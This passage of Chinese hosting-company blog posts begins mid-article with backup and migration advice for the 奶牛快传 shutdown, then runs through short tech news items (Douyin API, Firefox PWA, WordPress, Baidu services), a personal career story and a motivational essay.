CertUtil -hashfile 文件名 SHA256 # Linux/Mac: shasum -a 256 文件名 第三步:会员退款操作(如适用) 立即访问:官方提供的退款申请链接(原文中提到但未具体化) 准备材料:购买凭证、会员剩余时长证明 注意时限:停服后申请通道可能关闭 备用方案:如退款遇阻,公众号私信求助(官方指定渠道) 数据迁移的替代方案评估 企业级安全替代方案推荐 考虑到奶牛快传用户多为需要安全传输大文件的专业人士,以下替代方案需满足: 商业可持续性:有清晰盈利模式,避免重蹈覆辙 数据可控性:支持自托管或明确的数据导出方案 传输安全性:端到端加密、传输加密保障 临时应急方案: WeTransfer Pro:国际老牌,但国内访问可能不稳定 文叔叔:国内类似产品,但需评估其长期稳定性 自建SFTP服务器:技术门槛高,但完全可控 企业长期方案: 推荐架构: 1. 核心数据:自建Nextcloud/Seafile私有云 + 主机帮高防服务器 - 数据完全自主控制 - 支持端到端加密 - 可定制文件大小限制 2. 外部协作:企业网盘+安全外链 - 百度网盘企业版(需评估安全策略) - 腾讯云COS+CDN+临时密钥方案 - 阿里云OSS分享功能 3. 超大文件专线:物理硬盘邮寄+加密 - 对于TB级数据,物理传输仍是最可靠方案 - 使用Veracrypt创建加密容器 三、安全视角深度剖析:从奶牛快传看SaaS服务的三重风险 风险一:数据主权丧失 典型案例:用户文件存储在第三方服务器,服务终止即数据消失安全教训:任何云服务都应遵循“3-2-1备份原则” 3个副本:原始文件+2个备份 2种介质:至少一种为离线介质(如移动硬盘) 1份异地:至少一份存储在不同物理位置 风险二:商业不确定性传导 奶牛快传的“并购意向→最终关停”轨迹揭示了: 并购不等于延续:技术债务、商业模式差异都可能导致整合失败 免费/低价模式的脆弱性:缺乏可持续收入,最终难逃关停 用户成为谈判筹码:在并购谈判中,用户数据可能被用作估值资产而非保护对象 风险三:应急响应时间不足 从最终公告到数据清除仅3天时间,对于企业用户: 可能恰逢周末,IT人员不在岗 海量数据需要时间整理和下载 网络带宽限制实际传输速度 员工可能未及时看到通知 四、企业级数据安全方案:从被动应对到主动防御 方案一:【高防服务器+自建云盘】- 数据完全自主 适用场景:对数据主权要求极高的金融、法律、研发企业 架构示例: 前端:百度云防护WAF(防CC/DDoS) 中端:高防服务器集群(负载均衡+冗余) 后端:Nextcloud/Seafile私有云部署 存储:分布式存储+定期异地备份 特点: - 数据不出内网,符合等保2.0要求 - 传输全程加密,支持国密算法 - 可对接企业AD/LDAP统一认证 - 审计日志完整,满足合规要求 方案二:【混合云存储架构】- 平衡便捷与安全 适用场景:需要内外协作的中大型企业 内部核心数据:私有云存储(自主可控) 外部协作文件:企业级公有云(如腾讯云COS)+ 临时访问令牌 安全网关:主机帮云防护WAF统一管控出入口 备份策略:私有云定时备份至另一公有云(跨厂商容灾) 方案三:【全托管文件安全服务】 适用场景:缺乏专业IT团队的中小企业 服务内容: 1. 存储架构设计:根据业务特点设计分级存储方案 2. 安全策略配置:访问控制、加密传输、防泄露策略 3. 持续监控运维:7×24小时存储健康监控 4. 应急响应保障:数据恢复、迁移支持 产品组合:主机帮高防服务器 + 安全策略配置服务 五、立即行动指南:最后72小时checklist 1月8日(第一天):紧急抢救期 上午(9:00-12:00): □ 登录奶牛快传,列出所有重要文件清单 □ 按优先级标记:必须备份、建议备份、可放弃 □ 开始下载最高优先级文件(优先下载大文件) 下午(14:00-18:00): □ 验证第一批下载文件的完整性 □ 申请会员退款(如适用) □ 通知团队所有成员立即备份个人文件 晚上(自动化时段): □ 设置批量下载任务(如有API或工具支持) □ 本地NAS/硬盘准备就绪 1月9日(第二天):全面备份期 全天任务: □ 完成所有高、中优先级文件下载 □ 开始整理文件目录结构 □ 考虑数据迁移至新平台 □ 测试新平台的传输性能 关键检查: □ 检查是否有遗漏的文件夹 □ 确认分享给外部的链接已通知对方备份 □ 导出账户信息、历史记录(如有) 1月9日夜间至1月10日0时:最后检查 □ 最后一遍全盘扫描 □ 完成退款申请所有步骤 □ 公众号私信确认退款进度(如需要) □ 准备替代方案的上线 六、行业警示:免费互联网时代的终结与安全投资的价值 奶牛快传的关停是一个时代的缩影——纯免费、无广告的“良心”互联网服务正在变得不可持续。这背后是残酷的商业现实: 安全服务的“不可能三角” 理想情况:免费 + 安全 + 可持续 现实选择:最多只能满足两项 1. 免费 + 安全 → 不可持续(奶牛快传模式) 2. 免费 + 可持续 → 不安全(数据变现、广告追踪) 3. 安全 + 可持续 → 需要合理收费(企业级服务) 主机帮的产品哲学:透明、可持续、专业 我们提供的每一款产品——高防CDN、高防IP、云防护WAF、SSL证书——都建立在清晰的商业模式之上: 可持续的研发投入:对抗新型威胁需要持续更新,这需要收入支持 明确的服务承诺:SLA协议、数据导出方案、终止过渡期 专业的安全保障:不是“设置即忘”,而是持续监控和响应 特别对比: 奶牛快传:突然3天通知 → 数据永久丢失风险 主机帮服务:如需终止服务,提供至少30天数据迁移期 + 专业技术支持 七、给企业决策者的核心建议 短期(本周内) 立即启动奶牛快传数据抢救,按上述时间线执行 评估现有云服务风险:列出所有依赖的第三方SaaS服务 建立应急联系人清单:确保关键服务商有多个联系渠道 中期(1个月内) 制定数据主权策略:明确哪些数据必须自主掌控 建立供应商风险评估流程:新服务引入前的尽职调查 实施3-2-1备份策略:无论使用何种云服务,本地备份不可少 长期 考虑混合云架构:平衡便利性与安全性 投资专业安全产品:选择有明确商业模式、透明条款的服务商 定期进行数据迁移演练:确保应急时能够快速执行 结语:数据安全不能寄望于“良心”,而应建立在可靠的体系上 奶牛快传的落幕令人惋惜,但更值得深思的是:当我们将重要数据托付给任何第三方服务时,我们托付的不仅是存储空间,更是业务的连续性和数据的安全。 关键转变: 从“寻找免费工具”到“投资可靠服务” 从“便捷优先”到“安全与便捷平衡” 从“被动响应”到“主动架构设计” 对于那些正在使用奶牛快传的企业用户,现在面临的不仅是一次紧急数据迁移,更是一次重新审视整个数字资产安全策略的契机。 #### 好东西!抖音对外开放一键发布API和抖音分享SDK 第三方网站可分享至抖音 9月6日 消息:近日,抖音对外开放了一键发布API和抖音分享SDK。第三方平台通过抖音开放平台的官方网页(open.douyin.com)即可申请接入。成功接入后,用户可以将平台内容一键分享至抖音。 据了解,该功能于今年 3 月开始上线,目前除各种视频工具类应用外,硬件拍摄设备如大疆,游戏类如网易游戏和电商类等超过 200 个应用完成接入。 同时,抖音也积极与传统媒体合作,提供系统的短视频解决方案,包括抖音热点输出,抖音一键发布和数据反馈。日前,苏州广播电视台已率先完成接入。 未来是否wordpress也有分享抖音插件呢?或者用抖音帐号登陆会员呢?非常期待! #### 好文分享:打工妹逆袭顶级程序员的真实经历 家庭背景 我来自湖南省娄底的一非常普通农村孩子,我爸曾是一个木工,书读的不多,初中都没去上就开始到处实习给村里边做木工,也算是个手工匠,但后来什么都机器化,木工慢慢被淘汰。我妈她读到了初中,会踩缝纫机,但是在农村也没有对应的工作可以去做。我有个哥哥,他比大我一岁半,但是我们是一起同一个班上小学的,家里每个人都对他比较看重。 我们读完小学后,他宁可跪在雪地里也不去读书,我爸妈以及奶奶怎么劝他继续去读完初中,他硬是没有去读了,而我想去,虽然当时候读书的愿望也没那么强烈,也不懂,我爸看着我哥没有去,就不是很支持送我去读书,所以我就真停了一年。 期间我去向我的舅舅们学习理发三个月,去帮忙洗头,开始学习拿推子理发,第一次给人剪发,还记得人家的头发被弄得不像个样,后边只能剃光才能修复,没有兴趣继续学习下去,只好放弃;我又不喜欢在家里干农活,虽然我不是很爱学习,但是比起家里的农活或者学习理发,我更加喜欢去学校继续学习,向爸妈要求让我继续去读书,我爸还是不同意送我去读书,我妈赞同我去,所以去完成了初中毕业,中考的分数也还OK,考上县城的排名第三的高中。 去读高中也有点不容易,我爸说,现在已经读完初中可以了,高中不需要去上了,读那么多数也没用,典型的传统农民思想,七八月份恰好是稻谷收割时候,比较忙,错过了入学日期,本以为没有希望继续念书,但心里还是渴望去县城读书,家里亲戚开始劝说我爸让我去念完高中,我爸最后也答应了,但是那时公立中学是不行了,所以就去报了一个县城里的一个民办高中。 其实还不算是一个高中学校,学校的主要业务是复读班,辅助开了两个班来接受应届生,老师们参差不齐,有外地来的,有公立高中的老师想赚外快的,读的都是一些死书,读完高二后,学校的应届高中班都办不下去了,都不来报这个学校了,所以高三时我们就被拆分到各个复读班,就这样上完了高三,三年感觉什么都没做,玩没玩好,书也没读好,最后分数是399,二本线都没到,但也算是2009年顺利高中毕业。 高考完后,有个郴州的北XX青鸟软件培训机构在我们学校推广7天免费夏令营的活动,反正没事并且是免费就去参加了,7天里,了解到电脑这个东西很神秘,PPT在我眼里都很酷。 回去后就爸妈商量送我去这个培训学校学习软件,但那时家里恰好出了一点事,我哥开着摩托车出事让我姑姑进了医院,需要住院治疗,本来家境不咋地,再来这么个意外,哪有钱再让我去学习,只好死心,但在我心里就埋下了一颗种子,我想去多多了解电脑相关的。 2009-2010流水线工人 2009年高中毕业后,8月份就去了深圳,没什么才能,只能在工厂里做事,工作非常简单单调,上班,吃饭,睡觉,偶尔看看书记记流水账日记,大概工作八九个月的样子,当时在心里埋下的种子开始慢慢发芽,所以当时抽了一个周末就去深圳福田区的北XX青鸟了解计算机软件培训项目,了解到学费很贵,所存下来的钱(八九千的样子)都不够第一期的学费,就开始计划省钱,到了2010年5月份的样子就攒够了第一期的学费,就辞职不干了。 2010-2011边工作边学习 2010年5月,开始学习软件相关的课程(HTML,SQL,Java...),第一期时长大概是四个月的样子,上午上理论课,下午上机操作练习,晚上我给自己在肯德基找了一份兼职,从晚上六点开始,到11点结束,7块多钱一个小时,挣的钱恰好够我生活。 第一学期的生活很充实,在新环境下能够生活下去就足够了,没有时间去担心身边有没有朋友,有没有温暖,只是觉得一天天过得太快第一期学习完后没有钱继续报第二、三期,尝试去找过相关的工作,甚至文员相关的(心里想着就可以用有电脑学习了),很不幸运没有公司愿意提供机会。之后了解到另外一个IT培训机构提供边工作边学习的机会,就开始去了解,发现很适合我,付款方式提供分期付款,上课方式非全日制,赞! 2010年10月,开始边工作边学习,周三周五晚上,周日下午上课,其他时间在114百事通做电话客服,主要工作就是接电话给人订饭店,靠单挣钱,工资也有时拿到2300左右一个月的样子,好景不长,做了四个月,我被炒了鱿鱼,当时在工作上了犯了一个严重的错误,我也不打算隐瞒我错了什么,我利用了一些技术上的小聪明小漏洞去抢别人的单。。。当时恰好学校也搬迁到了深圳南山区,也需要一个新的工作。 2011年3月,开始找工作,有点不好找,一是工作时间要求配合我的上课时间,周三周五晚上7点上课,最后发觉可能只有工厂里的工作比较固定稳定,工资稍微比其他服务行业的也要好一点,最后找到一个在南山区里的Phillip电子工厂里上班的工作,现在已经不记得工作内容具体是做什么。 第三期的学费更贵了一些,需要付学费的首付,当时钱不够,就申请了一张额度为3000的招行信用卡,全部额度用来支付,开通分期还款,之后靠工资还剩下的学费以及每个月信用卡的还款额,就这样维持到了毕业,那时是2011年8月底。 2011-2017努力生活 2011年9月,开始进入IT行业工作,朝九晚六,周末双休,试用期拿着3000元的工资,转正后4000。在刚刚高中毕业的时候,心里就有一个“白领梦”,周末要双休,工资3000。到此时此刻,恰好符合,但这一切对我来说并不容易。生活开始趋向简单,两点一线的生活,几乎没有什么爱好,偶尔打打羽毛球,除去租房,生活费,再加上要还信用卡,每个月几乎是没有得剩。为了自己更加“富足”些,记得当时候还在哈根达斯找了一份晚上的兼职,10块钱一个小时,做了两个月就没做了。 2012年4月,开始学习英语,当时报了一英语培训机构(XX联),现在回想起来我也不知道是什么驱使我去学习它,将近三万的学费,培训机构恰好跟招行信用卡有分期还款的合作项目,没有利息和手续费,不需要一次性还清,每个月还款日还就可以了,所以当时就报了。下班之后,就开始去学习英语。 培训机构对帮助最大的地方应该就是让我有机会开口去说,我自己也算努力,BBC和VOA这两个网站提供很多音频教学资料,很多都是以主持人对话的方式的形式,我就下载了很多音频资料装在我的MP3里,上下班路上就听,英语水平一点点也在提升。 也因此,在14年6月份的时候,在公众号才刚刚开始兴起的生活,站在了风口,我创建了一个英语学习的公众号,刚建之初,就推送VOA教学音频资料,所有的音频,都有文本,做做笔记就整理出了图文,相当于是将自己的学习过程整理出来,很幸运到现在积累了6万多的粉丝。 在12年底,意识到将来如果没有文凭,也不好找工作,当时候就给自己报了西安交通大学的远程教育,学费总共是要一万多,有六个学期,可以按一期一期来交,每期是两千多,这个也只是为了拿个证而已,没有什么用。到了12年底,觉得每个月还信用卡的压力有点大,开始跳槽换工作。 2012年12月,高中文凭,一年多一点的工作经验,不好找工作,最后找到了在一小公司月薪6000的工作。慢慢趋向稳定,直到2014年下半年,生活还是跟之前一样,上班,学习英语,远程教育学习,考试,偶尔打打羽毛球,徒步。 2014年1月,拿到了大专文凭后,开始报了一个深圳大学的专升本的自考,周末去深圳大学上课,复习,一共有十几个科目需要考试,很多没用的东西需要去记忆,我应该是最幸运的,14年一年可以考四次(现在好像是两次了),每次好像是可以考两三门,利用了一年半的时间,就考完了所有的科目,2015年6月,拿到了深大的自考毕业证书和学士学位。在国内这个证其实没什么含金量。 但是其中的成绩单和学位证在我后来申请美国学校的时候,起了很大的作用。 2014年下半年开始,慢慢开始接触跑步,加入一些跑团,加入跑者的行列。当时候深圳有很多各种各样的有趣的跑步活动,我报名参加了很多,什么5k新年跑,彩色跑,荧光跑等等,纪念奖牌都拿了好多。 14年12月,报名了深圳国际马拉松的半程马拉松,跑了我的第一个半马。之后跑了很多个半马,五个全马。到现在,虽然不是我的最爱,但是只要我有时间,都会穿着跑鞋去跑个几公里。 2014下半年还发生了一件事,因为英语,我发展了一个新的爱好,有次参加一次英语公益型的讲座活动认识了一个玩飞盘的外国人,从此开始接触极限飞盘这项团队运动,发现是非常有趣的一项运动,一发不可收拾,慢慢将花在跑步上的时间转向飞盘。 每周玩两次,其他地方如果有飞盘赛事的话,有时间有经济能力的话就报名,各个地方到处去玩,上海,宁波,厦门,福州,广州,东莞,珠海,香港,菲律宾,泰国,马来西亚等等,顺便借着飞盘的名义,到处去玩,花了很多钱在这个爱好上,因为的所有的赛事活动都收取报名费,出行住宿都是自费,所以有些爱好有时候很烧钱的,哈哈。 2015年3月,跳槽到了互联网金融行业,但还是程序员,继续上班,偶尔跑跑步,玩飞盘,深圳当地的联赛,偶尔飞到别处去玩比赛,总之一有机会就到处去玩,我玩心很大,工作上能不加班就不加班。飞盘圈子里有外国人,有机会可以练练口语,英语没有进步,但至少没有退步,生活在深圳,快节奏的进行。 2016年圣诞节,跟朋友一起聚会,其中一个环节是所有人写下自己的愿望,挂在圣诞树上,我当时就萌生了一个愿望——我要去其他国家至少生活一年,无论是学习还是工作。 跟这个有点相关的另一个事情是,在16年7月份换工作的时候,在拉勾网上无意中看到了这样一个招聘,招赴美带薪实习的程序员,当时很好奇,就打电话问了下,了解到这是中国的一个招生代理机构在拉勾网上发布的一个一所美国学校的计算机科学的硕士项目,由于自己资金不够,当时就加了下qq,就此搁置。 2017年初,心中有出国的想法,就想到了去年7月份看到的招聘广告,就开始了解这到底是个什么项目,需要什么条件,需要多少钱等等,了解到我应该符合申请条件除了资金,要求一要有工作经验,二要有本科学位,三要有可以正常沟通的英语水平,四要能够支付第一期学费的首付以及生活费。虽然英语可以简单的沟通,但肯定远远不够,所以我需要准备的就是提高我的英语水平以及钱。 所以17年初就立下两个目标,到17年的九月份,1.雅思要过5.5分, 2.存款10万。 这个学校不要求有雅思托福成绩,但我知道雅思托福比较综合权威,报考这样的考试可以给自己动力以及反馈,就报了5月初考,考前准备了一个多月的样子,24号出了结果,5.5;关于存款到了9月份,我自己存了12万。从17年6月份,开始在网上自己申请,准备各种各样的资料,准备申请过程中的口语面试和技术面试,中间有遇到一些问题,走了一些弯路,但最后都解决了,申请通过,收到通知10.27号入学。 2017-2018新篇章 2017年11月,从09年到现在,经历了很多,再次将自己置身为一个学生身份,还给跨洋了,快速地去适应了身边的不同,学校的生活不能说很丰富多彩,但提供了一个刷新自我、挑战自我、接触多元文化、交国际朋友的一个平台。很感激有这么一个机会,让我认认真真体验了一把大学生活。 直到18年7月,每天做的事情就是认真上课,做作业,冥想,偶尔去健身房,偶尔去户外跑步(每次跑步都可以看到兔子),每天的课业还比较重,每天的作业要花2-3个小时才能完成,除了寒假期间出校去东西海岸去玩了十几天,其他时间几乎都是在学习。 2018年7-9月,从7月中旬开始投简历找工作,我在美国虽然是学生身份,但是我可以找全职工作,每周40个小时的工作。开启求职的旅程,各个简历网站更新简历,在美国找工作的流程跟国内有点不一样,一慢很多,二是大部分面试都是电话和视频面试。一开始电话不多,安排的面试也不多,没有电话就复习面试题,看学习视频。我一开始采取的策略是,尽一切可能给自己多安排面试,涨经验很重要。 虽然都是电话是视频面试,无论人在哪都没有什么限制,学校的地方在爱荷华州的一个小镇,工作机会就别想了,所以决定去加州找工作,生活费虽然要高很多,给自己压力也是一个动力。通过一些学长在圣何塞找好了住房,7月31号飞去了西部。 在新的地方就会有新的发现,认识的学长对刷题呀找工作都非常有经验,才开始意识到刷题的重要性,也是去了加州,遇到的很多面试都是要求算法数据结构过硬才行,碰了很多壁,刷题意识更加强烈了。 八月的每一天就在面试,刷题,跑步(无论在哪,美国的跑步环境真好)中度过。九月初拿了2个offer,一个在Arizona的凤凰城,另一个在纽约,9月12号定了去纽约,通知10月8号开始工作。 2018年10月,开启上班族的模式,与国内的工作环境相比最大的不同是语言和文化,第一次在这样全新的环境下,一开始真觉得有点挑战,无论是沟通上还是具体到工作上,发觉身边的同事都很优秀,他们的沟通表达能力以及解决问题都很强。但无论如何,一开始只要不影响正常工作,一切都会慢慢会好起来的。 来源:Ling Sun #### 好文推荐:搞废一个人的方式 01 作家李尚龙说:“在大城市里,搞废一个人的方式特别简单。给他一个安静狭小的空间,一根网线,最好再加一个外卖电话。好了,开始废了。” 之前的我并不相信人会这么轻易地堕落,直到身边出现了一个真实的例子: 前段时间的聚会上,见到了许久没见的一位同学。学生时代清瘦的少年模样,如今竟发福得如同中年大叔。 和他聊天后我才知道,毕业之后的他辗转换了几次工作,却仍无法适应上班生活。后来干脆辞职回家,靠着父母给的生活费,加上一点网络兼职的收入度日。 在家宅了一年多的他,很少走出家门,成天日夜颠倒、通宵打游戏、无节制地吃各种垃圾食品。 也许是因为长期缺少社交生活,我们跟他说话的时候,他的眼神总有些许呆滞,似乎要反应一段时间才能理解。 我开始真正相信:低质量的长期宅家生活,确实能改变一个人的心智、外貌,甚至是人生。 人喜欢在舒适熟悉的环境中待着。 而这种舒适区一旦建立,你就会变得无比依赖,慢慢地爱上周围的墙,恋上舒适的小屋,从而不愿意飞出去看看,怕看到外面熙熙攘攘的世界。 而一个人开始废掉的迹象之一,就是不再走出自己的舒适区。 心理学上有这样一个词,叫“花盆效应”,指的是人如果在舒适的“花盆”中待久了,就会不思进取、安于现状。 当你对现状心满意足,日复一日地去做着同样的事情,不再将时间花在提升自己,那么你的成长见识,将永远停留在原来的那块区域里。 曾看到这样一句话:一个人老去的标志,绝不是老成稳重、沉默寡言,而是不肯再尝试,不肯再容许自己置身不熟悉的境地。 当你停止了学习、固步自封,将自己囚禁在得过且过的牢笼中,那么你已经朝平庸迈进了一大步。 02 前几天去图书馆查资料,旁边的位置坐了一位穿着高中校服的男生。 他的面前摆着一本厚厚的教科书,眼睛却自始至终没有离开过手机屏幕。 当我翻完了一章晦涩难懂的英文原著,他戴着耳机,在看视频APP里的宅男女神跳手指舞; 当我收拾好东西准备离开的时候,终于看到他不再刷短视频了——他点开了游戏的图标。 这个娱乐至死的时代,获得短期的快感太容易了。 十几秒可以刷完一个短视频,二十分钟可以打完一把游戏,一小时可以看完半本小说。 段子张口就来,明星八卦关注得比谁都多,网红的名字如数家珍。 学习?不存在的。 顶多看几篇教你如何“短期内迅速提升自己”的碎片化文章,打完鸡血后依然浑浑噩噩,沉溺于感官娱乐之中。 一个人开始废掉的迹象之二,便是沉溺于短期快感之中,不再做长期投入。 玩游戏、刷视频、看小说,这些是顺应人性的,因为它们有及时反馈的机制。 你可以在短期内获得快感,哪怕这种快感是虚拟的、易逝的。 对比之下,学习、健身、提升工作技能,这些都需要漫长的反馈周期。 你需要投入很多时间、精力才能看到回报,远不如刷小视频、打游戏来得有意思。 太多人为了逃避思考而愿意做任何事。 尼尔·波兹曼在《娱乐至死》中说:“毁掉我们的不是我们所憎恨的东西,而恰恰是我们所热爱的东西。” 当你不再制定计划,而是一次又一次放纵自己沉溺于即时快感和虚拟的成就感中,你离废掉就不远了。 03 前几天,网上流传着一段高铁吃泡面的视频。 视频中,女子情绪激动、面目狰狞地指责吃泡面的男乘客,男乘客在整个过程中并没有一句过激的言语,而那名女子却喋喋不休。 其实,如果她能心平气和地提出自己的意见,我想那位男乘客也会去理解并寻找解决办法。 罗伯·怀特曾经说过:“任何时候,一个人都不应该做自己情绪的奴隶,不应该使一切行动都受制于自己的情绪,而应该反过来控制情绪。无论境况多么糟糕,你应该去努力支配你的环境,把自己从黑暗中拯救出来。” 一个人开始废掉的迹象之三,是沦为情绪的奴隶。 无法控制自己情绪的人,会给自己和他人带来不可预料的灾难。 著名的费斯汀格法则告诉我们:生活中的10%由发生在你身上的事情组成,而另外的90%则由你对所发生的事情如何反应决定。 一念天堂,一念地狱。当你深陷情绪的深渊,让理智随时被情绪牵着走,那么你离后悔就不远了。 真正成熟的人,一定是有能力控制自己情绪的人。 04 在国外有一个医学研究,工作人员询问了一百个在医院的老人:“你这辈子最大的遗憾是什么?” 几乎所有的回答都不是后悔这辈子自己做了什么,而是没做过什么——没有在最好的年华里修炼自己、没有冒过的险、没有追求的梦想...... 你是否也习惯了每天三点一线的生活,靠着短期的快感和虚拟的满足感度日,常常被自己的负面情绪所左右? 最可怕的是,我们即使对现状如此不满,却也没有勇气去改变。 就像《少有人走的路》中所说:勇气是,尽管你感觉害怕,但仍能迎难而上;尽管你感觉痛苦,但仍能直接面对。 向前一步,也许一切都会不同。 共勉。 #### 好未来旗下晓黑板将于8月31日停止服务 6月20日 消息:晓黑板团队今日发布公告:由于业务调整,自2022年7月15日起,晓黑板将停止注册新账号,已注册的账号可正常使用;2022年8月31日,晓黑板将正式停止运营与服务,晓黑板APP、网页版、PC客户端、数字校园管理后台届时将全部无法登录使用。 晓黑板称服务关闭后,除法律法规另有规定或晓黑板与用户所签署的协议另有约定外,晓黑板平台所有账号数据、内容等信息将会做清除处理,不会用于其他途径。用户可以根据需要在8月31日前自行完成相关内容、数据的下载与备份。 公开资料显示,晓黑板为好未来集团旗下品牌。天眼查信息显示,好未来持股比例超过65%。晓黑板上线于2015年,有设置“休息时间”、记录成长档案、好习惯打卡等功能。专注于架起家校沟通数字桥梁、助力公立学校信息化业务。 #### 好消息!FireFox 火狐浏览器开始支持 PWA 应用 3 月 18 日消息,FireFox 浏览器在长期忽视用户呼声后,于数月前宣布将支持 PWA(渐进式网页应用)。根据海外媒体 ghacks.net 昨日报道,如今,使用 FireFox Nightly(每夜版)测试版的用户可通过浏览器的设置页面中的实验性功能开启 PWA 功能(在设置页面中被称为任务栏窗口),尽管该功能目前尚不完善,但这个功能开关的出现似乎意味着距离正式上线已不远。 在本月初 FireFox136 版本推出垂直标签页、标签页分组等功能后,尽管 FireFox 在移动端扩展支持方面已领先于其他浏览器(如 Edge 移动版正在测试阶段,Chrome 移动版完全不支持),但在 PWA 方面支持却长期落后于其他浏览器。 FireFox 官方论坛获悉,Mozilla 员工 David Rubino 称任务栏窗口这项功能的重点包括: 将网页应用图标添加至系统任务栏 支持通过 PWA 直接打开关联链接 暂不计划实现从系统设置中卸载 PWA 的功能 PWA 应用是一种可以把网页程序直接变成类似于APP一样的应用,可以很轻松的把PWA 应用程序安装到电脑桌面和手机桌面。主机帮网站也有PWA应用程序,不过一直由于国内一直不支持,所以很少人用,目前谷歌浏览器支持。 #### 好消息!wordpress官网居然恢复了 主机吧博客是依托wordpress开源博客程序搭建的,自去年开始wordpress官方就因某些原因关闭了中国大陆区的正常访问,只要是中国大陆的访问者都提示429. 导致国内使用wordpress的用户出现更新不了插件和最新版本,这种现象提示一年多了,本来国内用户对官方解禁已经不抱任何希望了,某程序员还弄出了个中国仓插件:WP-China-Yes 结果今天主机吧发现官方(wordpress.org)居然可以访问了。 速度相比之前的速度是要快了不少,但是总得来说速度还是挺慢的,因为国内使用的是美国IP。 而且主机吧发现wordpress中文博客于去年11月开始就没更新过了。 而英文官网最新更新是本月26号的,不知道这是不是说明wordpress之前一直是放弃中国区的呢?不管怎么说现在是已经恢复了,不知道以后还会不会再出现问题,我们慢慢看吧。 #### 好消息!百度云加速免费版正式免费提供HTTPS加速 一直以为百度云加速免费版都是不提供HTTPS加速的,这也导致了很多站长使用免费版后,HTTPS没办法正常使用。 不过,最近好消息就是百度云加速开始为免费版用户提供HTTPS加速了。 需要在证书管理-申请证书 申请成功后再进入安全功能-HTTPS开启即可。 HTTPS加速模式 云加速为用户提供了三种HTTPS加速方式: 半程加密:仅在网民到CDN节点的访问采用HTTPS服务。 全程加密:网民到CDN节点和CDN节点到源站都采用HTTPS服务。但是不校验源站证书。须源站开通并支持SSL。同时支持自签名证书和受信任的CA签发的证书。 严格加密:网民到CDN节点和CDN节点到源站都采用HTTPS服务。且校验源站证书。须源站开通并支持SSL。只支持受信任的CA签发的证书。 请注意,HTTPS 加密需要配合证书使用,需要在证书部署成功后再进行设置及测试。 #### 好消息!百度新闻源改为算法识别了! 近期,百度发布公告显示:百度搜索资讯(新闻源)升级了纯机器识别分发了,以前由人工运营+策略识别正式放弃。 这意味着,以后想进入百度新闻源的网站只能靠算法去识别,类似今日头条的模式了。 同时,可能以后任何一个已备案的网站或百家号都有可能进入百度新闻源了。 “新闻检索数据库”主要收录各类发布新闻资讯内容的站点,已备案站点和百家号等内容只要满足准入标准,均可以通过策略分发。已备案站点不区分事业和政府备案站点、企业备案站点、个人备案站点,如cnBeta等部分优质科技资讯类站点就是个人备案站点。 下面我们来看下官方公告详情。 为满足用户对高时效性新闻资讯的需求,百度新闻检索数据分发策略在2017年由人工运营+策略识别的新闻源升级为纯机器识别的分发策略,符合准入标准的百家号内容和网站内容,无需申请都有机会通过百度时效性产品展现给用户。 【展现效果】 百度时效性产品包括但不限于时效性卡片、自然结果和资讯tab等,内容展现和排序均通过搜索策略进行实时动态调整。 PC时效性卡片: PC资讯搜索TAB: wise时效性卡片/资讯tab: 【新闻检索数据库的目标资源主体】 “新闻检索数据库”主要收录各类发布新闻资讯内容的站点,已备案站点和百家号等内容只要满足准入标准,均可以通过策略分发。已备案站点不区分事业和政府备案站点、企业备案站点、个人备案站点,如cnBeta等部分优质科技资讯类站点就是个人备案站点。 【新闻检索数据库的准入标准】 那么到底怎样的内容有可能进入“新闻检索数据库”呢?首先网站和账号必须通过合法备案,其次策略会从『权威性』、『影响面』、『内容价值』、『时效性』和『用户体验』这五个维度对百家号创作者和网站进行判断: 权威性:有一定知名度,被受众广泛普遍认可;或者在行业/垂类领域有一定影响力,拥有行业资质认证;拥有国家级政府官方背书,可保证信息的及时准确。   影响面:产出的内容可以广泛影响到尽量多受众,不受地域、人群等因素限制;或者在特定地域、领域、话题中,有自己的一席之地。 内容价值:有高质量原创能力,可以弥补某领域下的资源稀缺性问题;或者与全网千篇一律的稿件相比有一定的信息增益。 时效性:及时更新内容,普通大众领域实时或天级别更新,小众领域在保证内容质量的前提下,对更新频次的要求会适当放缓。 用户体验:页面功能可用,设置合理,体验流畅,用户不会被弹窗、浮窗、登录等干扰。 *熟悉百度搜索的创作者和网站站长开发者一定发现了,上述标准跟《百度搜索优质内容指南》的要求是一致的,我们会在多个业务线推动优质内容的优先展现。 【新闻检索数据库的惩罚机制】 百度搜索策略会根据内容准入标准对站点内容质量进行动态调整,同时也会通过日常人工巡查、用户反馈、例行评估等途径发现问题,对不符合要求的内容进行下线处理。如果发现内容所在的网站有刷热点、恶劣采集、作弊、站点内容售卖等情况,其内容有可能永远无法进入“新闻检索数据库”,同时也会同步相关团队降低其搜索评价。 #### 好消息!福建联通移动海外白名单制度疑似放开 有用过香港服务器的同学,可能会经历过,网站放在香港服务器上后,福建省会出现打不开的情况。 这个问题是因为福建省弄了一个白名单制度,一些没有备案的域名,服务器放在非大陆地区的,都可能会访问不了。主机帮这边有好几个客户出现这个问题,这个黑白名单是跟随域名的,只要你域名进了黑名单,只要你还是用海外服务器,都打不开,而且这个白名单制度还不好申请解封,简直投诉无门。 今天有站长反馈,身在福建,以前打不开的网站,今天可以打开了,为此,主机帮特地查了下以前打不开的客户网站域名,发现目前联通、移动的都可以正常打开了,而电信却还封着。 不清楚是暂时解封呢,还是以后都解封了,总之这个白名单制度苦了很多人,一些要访问外网的同学,经常会因为这个网址在黑名单里,打不开,而一些做外贸或者用香港服务器做免备案网站的,经常会进黑名单,导致福建根本打不开网站,影响很大。 #### 好消息:湖南域名根镜像服务器和国家顶级域名解析节点正式启用 9月10日消息 据人民网报道,9 月 8 日,由中国互联网络信息中心(CNNIC)指导建设的国家顶级域名湖南解析节点在 “2020 互联网岳麓峰会”上正式发布启用,同步建设部署的根服务器湖南镜像节点也进展顺利。 湖南 “两个节点”是在中央网信办、工信部等部委的关心和支持下,由 CNNIC 指导、湖南省委网信办牵头,国家超级计算长沙中心等单位具体承建。IT之家了解,“两个节点”将进一步提升湖南省乃至南方地区互联网响应速度和解析效率,提高互联网安全性和稳定性,使湖南省成为我国重要的信息枢纽之一。 多年来,CNNIC 积极引入根服务器镜像节点,大力推进国家顶级域名解析节点部署,不断提升我国互联网用户访问域名根服务器的效率和上网体验,增强我国互联网域名系统的抗攻击能力,降低国际链路故障对我国互联网的影响。 #### 好消息:百度普通收录自动推送功能正式恢复 9月17日 消息:昨日下午,百度搜索资源平台发布通知称,即日起搜索资源平台恢复“普通收录-自动推送”功能,自动推送仅对已关联主体的站点开放。 今年3月,百度宣布,由于升级维护暂时停止自动推送功能。 